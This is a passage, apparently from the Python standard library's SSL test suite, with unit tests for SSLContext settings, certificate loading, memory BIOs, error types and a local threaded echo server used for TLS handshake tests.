ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
@skip_if_broken_ubuntu_ssl
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertFalse(ctx.check_hostname)
# Requires CERT_REQUIRED or CERT_OPTIONAL
with self.assertRaises(ValueError):
ctx.check_hostname = True
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
        # The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
@unittest.skipUnless(_have_threads, "Needs threading module")
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s) as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple I/O loop. Call func(*args); depending on the error we get
# (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
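# Bytes produced by the SSL object are drained from the outgoing BIO and
# sent on the plain socket; when the SSL object reports WANT_READ, bytes
# received from the socket are fed into the incoming BIO.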
timeout = kwargs.get('timeout', 10)
count = 0
while True:
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(SIGNING_CA)
ctx.check_hostname = True
sslobj = ctx.wrap_bio(incoming, outgoing, False, 'localhost')
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def test_algorithms(self):
# Issue #8484: all algorithms should be available when verifying a
# certificate.
# SHA256 was added in OpenSSL 0.9.8
if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15):
self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION)
# sha256.tbs-internet.com needs SNI to use the correct certificate
if not ssl.HAS_SNI:
self.skipTest("SNI needed for this test")
# https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host)
remote = ("sha256.tbs-internet.com", 443)
sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem")
with support.transient_internet("sha256.tbs-internet.com"):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(sha256_cert)
s = ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="sha256.tbs-internet.com")
try:
s.connect(remote)
if support.verbose:
sys.stdout.write("\nCipher with %r is %r\n" %
(remote, s.cipher()))
sys.stdout.write("Certificate is:\n%s\n" %
pprint.pformat(s.getpeercert()))
finally:
s.close()
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
# should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
if _have_threads:
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
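# The handler echoes data back lower-cased and understands a few control
# messages from the client: b'over' ends the connection, b'STARTTLS' and
# b'ENDTLS' switch TLS on and off, and b'CB tls-unique' sends back the
# server's channel-binding data (see run() below).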
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ssl.SSLError, ConnectionResetError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
self.server.conn_errors.append(e)
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLSv1)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
